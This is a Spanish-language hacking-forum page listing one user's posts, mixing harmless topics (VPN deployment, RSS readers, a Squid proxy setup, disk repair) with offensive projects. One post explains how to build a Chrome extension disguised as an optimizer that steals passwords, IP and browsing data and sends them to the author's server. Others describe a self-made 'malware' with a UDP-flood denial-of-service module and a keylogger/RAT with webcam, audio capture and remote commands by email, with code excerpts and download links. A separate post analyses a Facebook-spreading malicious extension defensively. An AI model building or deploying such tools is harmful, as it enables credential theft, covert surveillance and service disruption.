Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - CodePunisher

Páginas: [1]
1
Despliega tu propia red VPN (Point-to-Point) para salvaguardar tu privacidad, anonimato y sin limitaciones.
La instancia que se desplegara será de tipo spot (https://aws.amazon.com/es/ec2/spot/). En cuanto al despliegue el estado de terraform puede ser guardado en un bucket aws s3 (https://www.terraform.io/docs/backends/types/s3.html), terraform enterprise (https://www.terraform.io/docs/enterprise/index.html) y de manera local, al momento de desconectarse de la VPN se eliminará de manera automatica la infraestructura y el estado de terraform (tfstate).
Repositorio


git clone [email protected]:davispalomino/aws-vpn-anon.git .
https://github.com/davispalomino/aws-vpn-anon/

Requisitos

- Cuenta AWS secret-access key
- AWS-cli (https://aws.amazon.com/es/cli/)
- Packer (https://www.packer.io/downloads.html)
- Ansible (https://www.ansible.com/resources/get-started)
- Terraform (https://www.terraform.io/downloads.html)
- Centos 7* (en caso de tener otra distro deberas editar la línea 184 del archivo Makefile "sudo yum install -y ppp pptp pptp-setup" reemplazarlo según su distro)

 Variables Requeridas
Name    Description    Type    Default    Required
REGION    Region de despliegue de infraestructura.    string    us-east-1    yes
TYPE    El tipo de servidor para la conexión VPN. standar/advance/high    string    standar    yes
SUBNET    La Subnet en la que se desplegara la infraestructura (requerida - PUBLIC).    string    n/a    yes
TFSTATE    Especificar si el tfstate se guardara en s3(bucket), enterprise(terraform) o local (https://www.terraform.io/docs/state/)    string    local    yes

 Ejecución

make quickstart

Desconección

make disconnect

Deployment


Infraestructura


View
[![asciicast](https://asciinema.org/a/2iejMOpmMqDnLGTf8xTQ3SrB6.svg)](https://asciinema.org/a/2iejMOpmMqDnLGTf8xTQ3SrB6)

2
Off Topic / Desktop Feed
« en: Agosto 08, 2013, 02:44:07 pm »
Desde la R.I.P. Google Read tuve que buscar otras maneras de no quedar desinformado ya que revisar una por una las 80 y tantas web que leo a diario, aveces suele quitar mucho tiempo de esa manera lo que necesitaba era aplicación de escritorio que sea multiplataforma así poder exportar e importar mis Feed.

¿Que rayos es un Feed?
Feed = fuente, alimentar y (sinónimos)
Si esta referido a una web de seguro el termino encaja perfecto con Fuente Web, un gran porcentaje de las web por no decir todas usan este medio para volver a transmitir lo escrito (en especial los blog) en dicha pagina pero en el se encuentras pequeños fragmentos del articulo(configurado por el webmaster) mas el titulo a cada porción de ello se le considera como un item , un lector puede suscribirse a un feed para obtener noticias posteadas en la pagina sin ir y revisarlas. El feed puede llegar a ser de 2 formas RSS y AtOM las dos tienes algo en particular que se encuentran en XML....

Por ello ya con varios meses (desde Enero) en mi Desktop va sin problemas

QUITERSS







Ahi les dejo el backup de mis feed: http://db.tt/oiJ0MYUL
QuiteRRS: https://code.google.com/p/quite-rss/downloads/list

Platformas
-Windows
-Linux(32 Bit & 64 Bit)
-OS/2

3
Otros lenguajes / Otra manera de aprender programación
« en: Julio 30, 2013, 02:15:06 am »
En el mundo existen 2 formas de aprender y la mejor desde mi punto de vista es siendo autodidacta aunque es el que mas tiempo te toma en aprender ya que solucionas tus problemas por tu cuenta, y ni que decir del sacrificio de las horas estando ahí detrás tratando de perfecionarlo y todo el esfuerzo lo llegas a valorar, la forma de buscar un material adecuado aveces no esta a nuestro favor, de la misma manera que existe codecademy también Programando.la dos website excelentes para encaminarte en el fascinante mundo de la programación.


En Programando.la encontraras material sobre: HTML5, Javascript y jQuery, CSS3, Python, Django, PHP, Java,Ruby, Ruby On Rails, C++, Git y Github, Node.js

"Hello World"

Progrmando.la

Progrmando.la

Link: Programando.la

4
¿Que es Proxy?

Traducción Proxy= apoderado,intermedio(sinónimos)

Es el intermediador de solicitudes que hace el cliente y la salida de las mismas para la obtención de una respuesta, (cliente envía solicitud a Host y si se verifica sus políticas con los filtros devolviendo la respuesta), llegando a almacenar la cache teniendo una respuesta óptima con respecto al tiempo, se allow y deny está basado en los filtros que se configuran (establecidas en la políticas de la empresa) además almacena log en lo que se encuentran las peticiones que hacen los clientes haciendo un uso adecuado de los log se puede reestructurar los filtros brindando un adecuado uso de banda ancha se puede  implementar mediante Hardware o Software

Software:

Puedes usar desde los de licencia pública o las de pago en que más te convenga en mi caso tuve la oportunidad de probar el famoso squid y dansguardian  con respecto a los de pago Tivoli, Microsoft Proxy Server

Hardware:

Mikrotik Aunque es el único que tuve la oportunidad de conocerlo en una visita.

2 Maneras de implementar un servicio proxy.

SQUID:

“Squid es un proxy caché para el Web de soporte HTTP, HTTPS, FTP, etc. Reduce el ancho de banda y mejora los tiempos de respuesta mediante el almacenamiento en caché y la reutilización de las páginas web frecuentemente solicitados. Squid tiene amplios controles de acceso y hace un gran acelerador de servidor. Se ejecuta en sistemas operativos más disponibles, incluyendo Windows y está disponible bajo los términos de la GNU GPL”  squid-cache.org

Si deseas conocer más acerca de squid lo puedes leer en su website.



1.-Descargar Webmin: (pudes verificar la versión www.webmin.com

Código: Bash
  1. wget [url]http://prdownloads.sourceforge.net/webadmin/webmin_1.630_all.deb[/url]

2.-Verificamos con dir luego de ello instalamos

Código: Bash
  1. sudo dpkg -i webmin_1.630_all.deb

Si no se llega a instalar y nos  muestra el siguiente error:

Webmin solucionado

Código: Bash
  1. sudo apt-get -f install

3.-El servicio se esta ejecutando

Código: Bash
  1. service webmin status

4.-Mostramos la IPprivada

Código: Bash
  1. ifconfig

5.-Colocamos en el navegador con el puerto 10000


https://ip´:10000

6.-Te logeas con el user y pass de Inicio

7.-Instalamos Squid

Código: Bash
  1. sudo apt-get install squid


Instalamos Squid

8.-Ahora configuramos el Squid nos dirigimos a Others > File Manager: Buscamos el directorio /etc/squid3/squid.conf.

File Manger

9.-Una vez en el directorio modificamos los siguiente:

#http_port 3128 quedando http_port 3128

#cache_mem 256 quedando cache_mem 256

cache_dir ufs/var/spool/squid3 100 16 256 quedando cache_dir ufs/var/spool/squid3 1000 16 256

10.-Reiniciamos el servicio sudo service squid3 restart

11.- Nos dirigimos a Un-Used Modulo>Squid Proxy Server

y le damos en ClickHere

Squid Proxy Server

12.-Nos dirigimos a /etc/squid/squid.conf

/etc/squid/squid.conf

13.-Y verificamos que se encuentra de la siguiente manera , si fuera el caso que no modificamos.

sort_conf=0
squid_restart=/etc/init.d/squid3 restart
squidclient=squidclient
cache_dir=/var/spool/squid3
sync_create=0
log_dir=/var/log/squid3
pid_file=/var/run/squid3.pid
cal_max=50000
squid_start=/etc/init.d/squid3 start
sync_modify=1
cal_fmt=w
cal_all=1
squid_path=squid3
calamaris=calamaris
squid_conf=/etc/squid3/squid.conf
sync_delete=0
cal_args=-aw
cachemgr_path=/usr/lib/cgi-bin/cachemgr.cgi
crypt_conf=0
restart_pos=0
squid_stop=/etc/init.d/squid3 stop
cal_extra=

14.- Reiniciamos el servicio de squid sudo service squid3 restart

15.- Un-Used Modulo>Squid Proxy Server y Agregamos las politicas

16.-Vea el video

Para revisar las configuraciones de filtro:
link1
link2

Saludos

5
Hardware / Reparando HDD(Hard Disk Drive o "Disco Duro") dañado
« en: Julio 22, 2013, 12:47:06 pm »
Buenas:



Muchas veces suele que a nuestras manos llega una portátil y si es windolero de seguro la pantalla azul y nos damos con la sorpresa que el HDD esta dañado, desconocemos los sectores pero lo importante es recuperar toda la información posible para ello entra a tallar un LiveCD existen múltiples desde los más livianos como VectorLinux,  Tiny Core , PupyLinux puedes elegir cualquiera con el que te sientas mas cómodo lo puedes utilizar para respaldar tus archivos.


Una vez realizado esa tarea mano a la obra a discernir los sectores dañados para ello puedes utilizar las distros de Linux o Windows  con la que te sientes mas cómodo en este hilo tratare de un LiveCD muy conocido llamado Hinren's uno de las herramientas de nuestra navaja suiza por sus muchas utilidades que le puedes dar, en este caso es reparar el sector si es que se da o como segunda opción aislarlo.

I.-OPCIÓN:

DRevitalize es un programa que repara sectores dañados(defectos físicos) en los dispositivos de almacenamiento magnético populares(Discos duros y también hasta cierto punto floppy) generando una secuencia especial de señales de alto y bajo nivel alrededor del área dañada físicamente. La superficie de casi cualquier unidad puede ser reparada con esta herramienta (incluso discos duros que han sufrido caidas o han sido expuestos a fuertes campos electromagnéticos).


hiren's


hiren's DRevitalize


hiren's DRevitalize


hiren's DRevitalize


hiren's DRevitalize


hiren's DRevitalize

Esperemos a que termine en su totalidad.

II.-OPCIÓN:

Victoria es una poderosa herramienta para las pruebas y el diagnóstico de los discos duros.  La aplicación dispone de un gran número de opciones, lo que permite, entre otras cosas, para determinar el estado actual del equipo, desactive la caché y reparar los sectores defectuosos.  Con un poco de práctica se puede medir la velocidad de lectura y escritura de datos, o seleccione el parámetro AAM (Advanced Managament Acoustic) de tal manera de silenciar el disco.



Victoria 4.46b


Victoria 4.46b


Victoria 4.46b


Victoria 4.46b

Luego de ello esperar que finalize.

III.-OPCIÓN:

Partition Bad Disk aplicación que fue diseñada para proporcionarte un medio simple de crear particiones de disco saludables. Esta herramienta analiza exhaustivamente el disco duro y aísla automáticamente los sectores defectuosos para que las particiones de nueva creación pueden estar completamente limpias de estas cuestiones


Partition Bad Disk


Partition Bad Disk


Partition Bad Disk


Partition Bad Disk


Partition Bad Disk


Partition Bad Disk


Partition Bad Disk

Alguno de estas 3 opciones debe servirte por lo menos 1.

Link:

Hiren's: http://www.hirensbootcd.org/download/

Para la OpcionIII

Link: Partition Bad Sector http://db.tt/Or2ekn9h

Tu navaja suiza es FORMATEAR la mía Reparar

 Saludos

6
Manuales y libros / El inicio de 1 MVP Microsoft
« en: Junio 06, 2013, 01:08:20 pm »
Casi la gran parte de las personas nacen con un S.O. bajo el brazo, la mayoría nació con Microsoft me incluyo pues Windows98 fue el primer paso a este mundo.
Detrás de cada S.O hay mil módulos, cursos, diplomados, etc que nos instruyen a un mas, en este caso microsoft aporta con un aprendizaje de sus IT y que de seguro a los que les gustaría seguir los pasos de un MVP les servirá como base.



Ademas encontraran un sistemas de puntuación muy influyente sin mas ni menos les dejo el link

https://www.microsoftvirtualacademy.com/GetStarted.aspx

El curso de Seguridad en la Nube se ve realmente estupendo....

7
Seguridad / Aprendiendo conceptos básicos de Seguridad Informática
« en: Junio 05, 2013, 01:44:44 pm »
Entre algunos link recuperados de mi backup me tope con algo muy llamativo y de seguro a mas de uno le interesara acabo de darle lectura a un par de módulos y son de mucha utilidad para reforzar todo lo que uno ya conoce o aun no.

Se trata de la Plataforma Educativa de ESET.
link: https://edu.eset-la.com/

8
Otros lenguajes / Aprender a programar
« en: Junio 04, 2013, 01:30:36 pm »
Hace ya varias semanas me encontraba inactivo a causa de un accidente pero eso no amilano al espíritu programador, asi que les vengo a compartir una buena página en la que se aprenderá desde lo mas easy hasta lo mas hard.


Cursos:

HTML & CSS
JavaScript
Python
Ruby
Jquery
Php
Apis
.... y muchos retos

Así de la misma manera que uno puede llegar a aprender , también puede armar sus propios cursos.
Los cursos son 100% prácticos.


Link: www.codecademy.com




9
Off Topic / Compartiendo mis RSS feeds
« en: Abril 26, 2013, 02:41:53 pm »
Después de algunos días de inactividad, decidí compartirles una parte de mi vida diaria, donde me la paso casi un buen tiempo al despertar desde el Desktop..

http://www.securelist.com/en/feeds
http://www.securelist.com/en/rss/allupdates
http://www.syue.com/e/web/?type=rss2
http://hack0wn.com/?feed=rss2
http://cxsecurity.com/wlb/rss/exploit/
http://www.exploit-db.com/rss.xml
http://feeds.feedburner.com/blogspot/JOz
http://cxsecurity.com/wlb/rss/exploit/
http://hack0wn.com/?feed=rss2
http://blog.ariko-security.com/?feed=rss2
http://packetstormsecurity.com/feeds
http://1337day.com/rss
http://blog.buguroo.com/?feed=rss2
http://www.inteco.es/contenidos_rss/
http://feeds.feedburner.com/DabowebRSS
http://secunia.com/advisories/historic/feed
http://feeds.security-database.com/Last100Alerts
http://osvdb.org/feed/vulnerabilities/viewed.rss
 http://osvdb.org/feed/vulnerabilities/blogged.rss
http://blog.ariko-security.com/?feed=rss2
 http://packetstormsecurity.com/feeds
 http://www.b1nary0.com.ar/feed
 http://www.areopago21.org/feeds/posts/default
 http://insecure.org.mx/feed
 http://www.sec-track.com/feed
 http://elladodelnovato.blogspot.com/feeds/posts/default
 http://sub-soul.blogspot.com/feeds/posts/default
 http://feeds2.feedburner.com/Cavaju
 http://tic-seguridad.blogspot.com/feeds/posts/default
 http://hacking.mx/feed/
 http://sub-soul.blogspot.com/feed
 http://www.cavaju.com/feed/
 http://tic-seguridad.blogspot.com/feed
 http://feeds.feedburner.com/seguridadblanca
 http://feedburner.google.com/fb/a/myfeeds
 http://www.seguridadblanca.com/feed
 http://blogs.itpro.es/miequipoestaloco/feed/
 http://blog.buguroo.com/?feed=rss2
 http://danigargu.blogspot.com/feeds/posts/default
 http://feeds.feedburner.com/Apuntes-Seguridad-Informacion
 http://pabloteijeira.wordpress.com/feed/
 http://feeds.feedburner.com/Spamloco
 https://www.mkit.com.ar/blog/feed/
 https://www.mkit.com.ar/blog/feed
http://www.r00t-security.com/feed/
 http://feeds.feedburner.com/neobits
 http://realpentesting.blogspot.com/feeds/posts/default
 http://www.hacktimes.com/feeds.xml
 http://www.sinfocol.org/feed
 http://blog.pepelux.org/feed/
 http://www.hacktimes.com/feed
 http://xora.org/feed/
 http://www.rzw.com.ar/feed
 http://www.shellshocklabs.com/feeds/posts/default
 http://feeds2.feedburner.com/GuruDeLaInformtica
 http://feeds.feedburner.com/DabowebRSS
 http://vtroger.blogspot.com/feeds/posts/default
 http://feeds.feedburner.com/zoomred
 http://seguridadyredes.wordpress.com/feed/
 http://www.chullohack.com/feed/
 http://feeds.feedburner.com/DetrasDelFosforoVerde
 http://feeds.feedburner.com/SXato2
 http://www.seguridadparatodos.es/feeds/posts/default
 http://www.seguridadparatodos.es/feed
 http://licenciaparahackear.wordpress.com/feed/
 http://www.villacorp.com/blog/feed/
 http://calebbucker.blogspot.com/feeds/posts/default
 http://1gbdeinformacion.blogspot.com/feed
 http://feeds.feedburner.com/Pentesteres
 http://www.pentester.es/feeds/posts/default
 http://blog.zerial.org/feed/
 http://www.pentester.es/feed
 http://feeds.feedburner.com/hispasec/IcLa
 http://seifreed.com/feed/
 http://feeds.feedburner.com/UnTal4n0nym0usEnElPc
 http://www.enelpc.com/feeds/posts/default
 http://conexioninversa.blogspot.com/feeds/posts/default
 http://feeds.feedburner.com/0v3rl04d1nTh3N3t
 http://conexioninversa.blogspot.com/feeds/posts/default
 http://0verl0ad.blogspot.com/feed/
 http://elblogdeangelucho.com/elblogdeangelucho/feed/
 http://www.dragonjar.org/feed
 http://www.hackplayers.com/feeds/posts/default
 http://www.seginformatica.net/feeds/posts/default
 http://hackplayers.blogspot.com/feeds/posts/default?alt=rss
 http://feeds2.feedburner.com/ITFreekZone
 http://www.enfoqueseguro.com/feed
 http://feeds.feedburner.com/Hacking-blackploit
 http://kinomakino.blogspot.com/feeds/posts/default
 http://feeds.feedburner.com/OpenSecurity
 http://blogs.eset-la.com/laboratorio/feed/
 http://www.seguridadjabali.com/feeds/posts/default
 http://blog.elhacker.net/feeds/posts/default
 http://feeds.feedburner.com/SecurityByDefault
 http://www.flu-project.com/feed
 http://feeds.feedburner.com/SeguridadDeLaInformacion
 http://feeds.feedburner.com/Seguridadapple
 http://feeds.feedburner.com/ElLadoDelMal
 http://feeds2.feedburner.com/SecurityArtWork
 http://www.soyforense.com/feed/
 http://feeds2.feedburner.com/NoticiasSeguridadInformatica

Si ustedes tienen algunas no duden en compartirlas...!!

SAludos

10
Hacking / La Biblioteca del Backtrack
« en: Abril 09, 2013, 10:16:31 pm »
Hace unos días me tome un descanso y regrese a mis orígenes ... me tope con un material muy bueno para los que desean surfear por este mundo de la Seguridad Informática, aunque es algo básico-intermedio pero muestra el uso de las mayorías de las tools que cualquier distro de seguridad trae consigo .Para aquellos que empiezan a dar sus primeros pasos de seguro les ayudara a caminar.


ojo esta en ingles: Pero cuenta con imágenes así que si no se denomina ese idioma te podéis guiar con las capturas que en ella se encuentran.

URL: hackingdna.com

P.D.: Espero no que no encuentre en algún post si fuera así lo eliminare....

11

Al parecer esto se lo debo al dolor de cabeza que tuve ayer por la noche que hizo que me distrajera con alguna idea que se me salia de la imaginación  Como hace unas semanas vi un archivo javascript capaz de mostrar las contraseñas en forma local (escuchar al servidor) y en el nos arrojaba las contraseñas y el email.

Así que decidí ir por aquella imaginación que era tratar de enviar datos en forma remota:

1.- Primero se me paso por la cabeza que el javascript cree un archivo txt luego enviarlo, pero para crear un archivo txt un depende mucho de si es usuario que navega tiene los permisos suficiente Ademas no es lo mismo crear un txt linux-windows. Pero dije no es una loca idea.

2.-Segundo se me ocurrió enviar los datos via email. Pero como sabemos javascripit no es posible enviar , averigüé un poco mas que si se podía hacer mediante phpmailer pero dije bahh para eso necesito que hsoting tenga SSL ocorriento  443 , eso por que gmail-outlook necesita una conexión segura.

3.-Tercero pensé en enviar por el puerto 21 (FTP)para enviar los datos o sobre escribirlo  hice una conexión exitosa, pero como enviaba el archivo. Aunque con php si era posible pero lo que necesitaba era javascript... =(

Código: PHP
  1. function ftp_login(form) {
  2.  var login = form.login.value;
  3.  var pass= form.clave.value;
  4.  var sererr = form.servidor.value;
  5.  if (login && clave && servidor) {
  6.  var ftp_connect = "ftp://" + login + ":" +pass + "@" + server;
  7.  window.location = ftp_connect;
  8.  }
  9.  else {
  10.  alert("=(No se conecto");
  11.  }
  12.  }

4.- Entonces dije si creo un zip el el que se guarde la contraseña y luego pueda enviarlo. Pero aun que sabia no era posible enviármelo al correo pero tal vez al FTP, puede llegar a crear un archivo zip pero con php e incluso podía enviar una imagen , uhmm entonces creí que tal vez podía enviar un screen, pero bueno sera para otra ocasión. Pero aquí esta el link con el cual se puede crear el archivo zip http://stuartk.com/jszip/

5.- Creo que las ideas se me acababan ya era las 3 a.m de la madrugada así que dije uhmmm me recode de XXS y dije EURECAAAAAAAAAAAA....!! Lo tenia...!!
Empecemos...!!
Bueno primero lo primero para crear el crx ( que es la extensión que tienen los complementos de Google Chrome) necesitamos 2 archivos el *.json y *.js (que es el javascript). En el *.json se encuentra la descripción del complemento . En mi caso fue lo siguiente: NO SE DEBE CAMBIAR EL NOMBRE" manifest.json"
https://www.dropbox.com/s/xf6k56wd2fziwbz/extension%20underc0de.zip


Por que esta en ingles pues cuando instales el complemento la mayoría cuando se encuentra en otro idioma solo le pones YES.. asi que mejor esta ese idioma ademas el titulo es resaltante OPTIMIZAR Google Ghrome "En otras palabras " Obtener tu user y pass ". Luego verán que dice chrome.js ese es el archivo Javascript.

Ahora editamos el chrome.js lo único que necesitas editar por nuestro hosting  "localhost" Reemplazan por el suyo.


el javascripit tiene que estar en tener el tipo de codificacion UTF-8. Luego de ello vamos chrome y  *.json y *.js debe encontrarse en una carpeta.

Una vez abierto Chrome se dirigen a Extensiones.


Cuando nos encontremos ahi das click en el checkbox de Modo Desarrollador y luego Empaquetar Extensión.


Ahora se dirigen a la carpeta en donde se encuentra el *.json y  *.js en mi caso es C:\Users\Administrador\Desktop\Optimize Google Chrome esa misma dirección colocamos en el siguiente popup.


Luego empaquetara la extensión de google chrome.


Para poder instalar la extensión necesitas agregar

--enable-easy-off-store-extension-install

a las propiedades del acceso de google chrome.


Eso seria lo único negativo =( ..!!

Seguimos ahora ya podemos colocar la dirección que nos arrojo el popup en mi caso C:\Users\Administrador\Desktop\Optimize Google Chrome.crx el cual colocamos en la barra de dirección.

Ahora ya esta el 90 % del trabajo hecho, ahora solo necesitamos subir al hosting el archivo guardar.php acompañado de un archivo datos.txt (datos.txt debe tener los permisos suficientes para ser modificados).



ese archivo junto con el datos.txt deben subirlo al host. Si todo resulto bien cuando se ingrese a una pagina los datos serán enviados a http://localhost/datos.txt


http://underc0de.net/multiconversor.php usan el DECODEURL para no colocar un pass o un user incorrecto
Con la extensión se puede obtener:
<ul>
   <li>Contraseñas /Usuario</li>
   <li>El lenguaje</li>
   <li>Protocolo por el cual se navega</li>
   <li>El proxy</li>
   <li>Obtenemos el puerto</li>
   <li>El agente (wap o web)-(S.O)-(Navegador aunque ya sabemos que es google Chrome)</li>
   <li>La dirección ala que se accede</li>
   <li>La fecha.</li>
   <li> Y por supuesto la IP pública (podemos acceder a su router si es que la contraseña la tiene por default)</li>
</ul>

Link de Descarga : https://www.dropbox.com/s/xf6k56wd2fziwbz/extension%20underc0de.zip

El dolor de cabeza que se convirtió en una Extensión para Google Chrome
Un AGRADECIMIENTO Especial a :
sh4r3m4n

Saludos

12
Agregando mas funciones a nuestro “malware” underc0de.exe, En este caso tomamos en cuenta a un factor dentro de la seguridad denominado negación de servicio (denial of services), uno de los más usados en la actualidad que también constituye  parte de las etapas de un Ataque (“Pentestig”) y que cada vez que escucho o leo el algún artículo se me viene a la mente “MafiaBoy” uno de los grandes ataques usando este método.
En qué consiste el Dos cada vez que uno accede a un sitio web envía cierta cantidad de paquetes de datos en los cueles se incluye información que será devuelta por el servidor, esa cantidad suele ser mínima de esa manera no afecta al redimiendo del host a quien va dirigido la consulta, pero en este caso si llegáramos a enviar grandes paquetes para saturarlo además de utilizar no solo un ordenador si múltiples en este caso sería una distribución de negación de servicio conocido como “DDOS” y de esa manera alertaríamos el tiempo de respuesta que suele ser ms “milésimas de segundo”.
Hay muchos tipos de ataque usando flood, en este caso solo tome el concepto de uno de ellos llamado UPD Flood.

El UDP es un protocolo que corresponde a la capa de transporte juntamente con el TCP, DCCP … en Esta se incluye a 2 componente el destinatario y el destino. El UDP utiliza los datagramas o bloques de información que contiene la información necesaria haciendo que la red solo lo dirija hacia su destino  peor en este caso hablando ya de UDP no necesita establecer conexión con el destinatario para el envió de datagramas ya que en la cabecera del paquete se encuentra la información necesaria para encontrar su destino. Y por consiguiente tampoco se tiene confirmación si se llego con excito o no el paquete.


UPD Flood: Es inundar con grandes cantidades de paquetes UDP enviados a host llegando a un puerto aleatorio o ya establecido. Cuando el datagrama llega a su destino el apquete ira akl pa que aplicación será dirigida, pero cuando no se encuentra que dicha aplicación que se encuentra en dicho puerto no requiere dicho paquete se generara el conocido Internet Control Message Protocol (notificación de errores) como por ejemplo cuando un host no esta disponible. Cuando se llegan enviar múltiples paquetes podemos hacer que el sistema deje de funcionar.
Para proteger de este tipo de ataques se puede utilizar un firewall o las diferentes tecnologías como IPS(Intrusion prevention system ), filtrar los paquetes UDP y sobre todo monitorear la red y sus servicios.
Con un poco de teoría pasamos a ver como funciona:

Se envia con los parámetros necesarios:

IP: direcion ip
PORT: puerto
PACK: tamaño del paquete
SOCK:Repeticion se incluira en un for previamente en el código


http://www.t1shopper.com/tools/port-scan/
o tambien puedes usar el famoso "namp"

un previo Testeo:


VER:http://underc0de.org/foro/programacion-de-malwares/un-malware-llamado-%27underc0de-malware-exe%27-!!-15117/

Link de Codigo Fuente: https://www.dropbox.com/s/jtutewf9rltel2i/r00t%20Security%201.5.zip
Link del Decryter https://www.dropbox.com/s/khxxhvlkavsdspg/RootSecurityDecryptedEXE.zip
Link de ILMerge http://www.microsoft.com/en-us/download/details.aspx?id=17630
Link de myIp.php https://www.dropbox.com/s/4o6gsl9rcbs8bmn/myIp.zip


'*****************************************
'*****************README******************
'*****************************************
Underc0de.exe es un proyecto de Open Source (GPL) con el fin de enseñar y promover la conciencia a los internautas sobre la problemática que curren
cuando un malware infecta a los ordenadores. No me responsabilizo de cualquier uso malintencionado que se haga del proyecto, así como de las modificaciones que los usuarios puedan realizar al código fuente de las aplicación, tampoco me hago responsable de las copias del proyecto que sean distribuidas a través de otras website o usuarios y que puedan haber sido modificadas con intenciones dudosas.

Un agradecimiento Especial para la comunidad que me acogio UNDERC0DE
Este proyecto es para vos.

13

El celular no deja de sonar por las múltiples notificaciones que recibía y todas eran la por las  etiquetas que recibía mi cuenta de Facebook, joooder y todas tenían una dirección algo extraña. www.ناماراتاماراتامارات.امارات  y según google es Persa… que rara dirección. Así que agarre el ordenador y me puse a averiguar porque me daba mala espina. Vi la dirección de la redirección y era esta www.xn--mgbaaaaaaaaydd5fee22afff.xn--mgbaam7a8h  WDF…!! Pero seguí mas adelante tome la dirección www.sosyalpaket.net  al parecer la primera dirección era el camuflaje aquella te envía a otra página según el navegador que tengas. Con el Siguiente código:

Código: PHP
  1. var is_opera=navigator.userAgent.toLowerCase().indexOf("opera")>-1;
  2. var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
  3. var is_safari=navigator.userAgent.toLowerCase().indexOf("safari")>-1;
  4. var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
  5. if(is_chrome){inst="[url]http://www.sosyalpaket.net/chrome.php[/url]"}
  6. else
  7. if(is_firefox){inst="[url]http://www.sosyalpaket.net/firefox.php[/url]"}
  8. else
  9. if(is_opera){inst="[url]http://www.sosyalpaket.net/chrome.php[/url]"}
  10. else
  11. {var inst="[url]http://www.sosyalpaket.net/chrome.php[/url]"}

Lo que te envía es a descargar un complemento según el navegador que tengas, en este caso lo teste con firefox y me envió a descargar un complemento.

Con el siguiente mensaje:

Por favor, botón Actualizar Firefox Actualice.
Debido a los errores del sistema y vulnerabilidades de seguridad que se requieren pulsando el botón Recargar
Instalar el plug-in de Firefox Update.
Siempre y cuando usted no ha actualizado las características del sitio faydalanamayacaksınız.


Lo que me dio risa fue ese mensaje de “Debido a los errores del sistema y vulnerabilidades de seguridad” jajajaja le seguiremos la corriente una vez descargado abrimos el complemento con winrar pero antes lo escaneamos para ver si este malware ya fue reportado.

https://www.virustotal.com/es/file/8c3f282af8c718b69bcd142adfed63fc1dfde3b08a3677972dd08bf2a787604f/analysis/

y el resultado fue 6 / 45 así que por el momento no todos los antimalware lo reconocen. Ya que lo tenía abierto empecé a entender las líneas de códigos.


Y encontré algo que me resulto familiar

Código: Javascript
  1. if(location.hostname.indexOf("facebook.com") >= 0){
  2.  
  3. addJavascript('[url]http://sosyalpaket.net/yeni.php');[/url]
  4.  
  5. addJavascript('[url]http://fbmedyahizmetleri.com/bakgel.php');[/url]
  6.  
  7. addJavascript('[url]http://facebookhizmetlerim.com/user.php');[/url]
  8.  
  9. }

En el user.php me tope con:
Código: PHP
  1. "[url]https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1[/url]" + params, true); }
  2.  
  3. else { xmlhttp.open("GET", "[url]http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1[/url]" + params, true); }

Es por ese medio por el cual se propaga y si llegas a descargar por que eres de aquellas personas que le da click a todo button que ve solo basta con dirigirte a tu navegador al apartado extensión o complemento según sea el caso y verificar una similar a ello.


Lo más razonable es eliminarlo.
Saludos

14
Este artículo lo tenía guardado y por falta de tiempo no lo di a conocer, hace una par de semanas para ser exactos creo que fueron 2 publique un artículo que se tratada sobre un “Mouselogger” (denominado así pues capturada los click en determinados procesos), pero esta vez les traigo algo un poco más complejo bueno por así decirlo este. A comparación del lo publicado hace semanas este no captura las coordenadas de los click que se realizan si no por otro lado captura el imágenes de la webcam, grabaciones, envió de código a la terminal y por su puesto el infaltable log del teclado. Eso está incluido en la versión alfa pues puede llegar a salir a la luz los infaltables errores. Pero por  el momento es todo ello lo que nos puede ofrecer la pequeña aplicación que es este caso lleva el nombre de “Underc0de.Malware”.

Una Captura del Solution Explorer:


Cada proceso que a realizar se encuentra en una carpeta especifica, para así de esa manera tener más orden. Empecemos a explicar un poco el código y como se ejecuta:
Código: vb.net
  1.         Keylogger_CreateTxt.load()
  2.  
  3.         Move_Exe_Ejecutarse.MoverExe()
  4.  
  5.         Autorun.Autorun()
  6.        
  7.         BuscarDispositivos()
  8.  
  9.         CreateCarpeta.Carpeta()
  10.      
  11.         Systeminfo.DatumPc()
  12.      
  13.         Intervalo_Pop.Timeejecutar(Intervalo_Pop.tiempototal)
  14.  


1.- Como se ve el primero en ejecutar es la creación de la carpeta pues será esa el nido de nuestro malware
2.- Lo siguiente será mover nuestro exe a dicho carpeta creada
3.- Se ejecutara el autorun
4.- Busca un dispositivo de CamWeb
5.- Realiza ya comprobación para conocer la IP pública, IP privada y el nombre de la PC.
6.- Se ejecuta el intervalo de comprobación POP

Hay un Modulo
Código: vb.net
  1. Config_General
en el cual se encuentra parámetros como el Email, ubicación de Carpetas, tiempo de verificación de POP, Webcam, Log del teclado, Rec Audio,Capture Pantalla y el Terminal. Si se decide cambiar parámetros es en ese modulo donde se debe reemplazar con el valor que usted desea.


Si llega un mensaje del destinatario al que se enviara el mensaje:

Código: vb.net
  1.     Public Config_Para As String = "[email protected]"

NOTA: El mensaje que se envía debe ser el mismo al que se enviara el mensaje. Para así otras personas que envían el parametro de un correo diferente el programa los desconosca.
Esto son las variables que reconoce el programa cuando se envía

Código: vb.net
  1.             Dim ComanPantalla As String = "Pantalla"
  2.             Dim ComanWebcam As String = "WebCam"
  3.             Dim RecAudio As String = "RecAudio"
  4.             Dim Terminal As String = "Terminal"
  5.             Dim Keylogger As String = "Keylogger"

Estos variables deben estar en el Asunto


Eso sucederá para Captura de Pantalla, Webcam y Keylogger. Pero a diferencia del Terminal(que lo denomine así al Consola de Windows) en Asunto sería diferente.


La forma de escribirlo en la consola de Win seria: ipconfig /all , el espacio lo he reemplazado por los “:” dos puntos, pero si solo se quiere enviar un consulta sin argumento sería de la siguiente manera:


En este caso después de los dos puntos se encontrara vacio. Pero se debe colocar necesariamente los “:” sin espacio alguno al final.

Mientras para RECAUDIO el intervalo que tu coloques:

Código: vb.net
  1. #Region "Tiempo Verificacion POP"
  2.     Public Tiempo_Verificacion_POP As Integer = 6 'intervalo de 6 minutos para la consulta POP
  3. #End Region

no debe ser mayor al numero de grabación ( en la siguiente version lo solucionare), para la grabación debe ser de la siguiente manera:

"1" es el tiempo de grabación si deseamos que grabe 2 minutos pero sin llegar a serl el valor de la consulta pop, seria: RecAudio 2 (esto debe ir en asunto)

Como vemos esta line de código

Código: vb.net
  1.     Public Function GETIP()
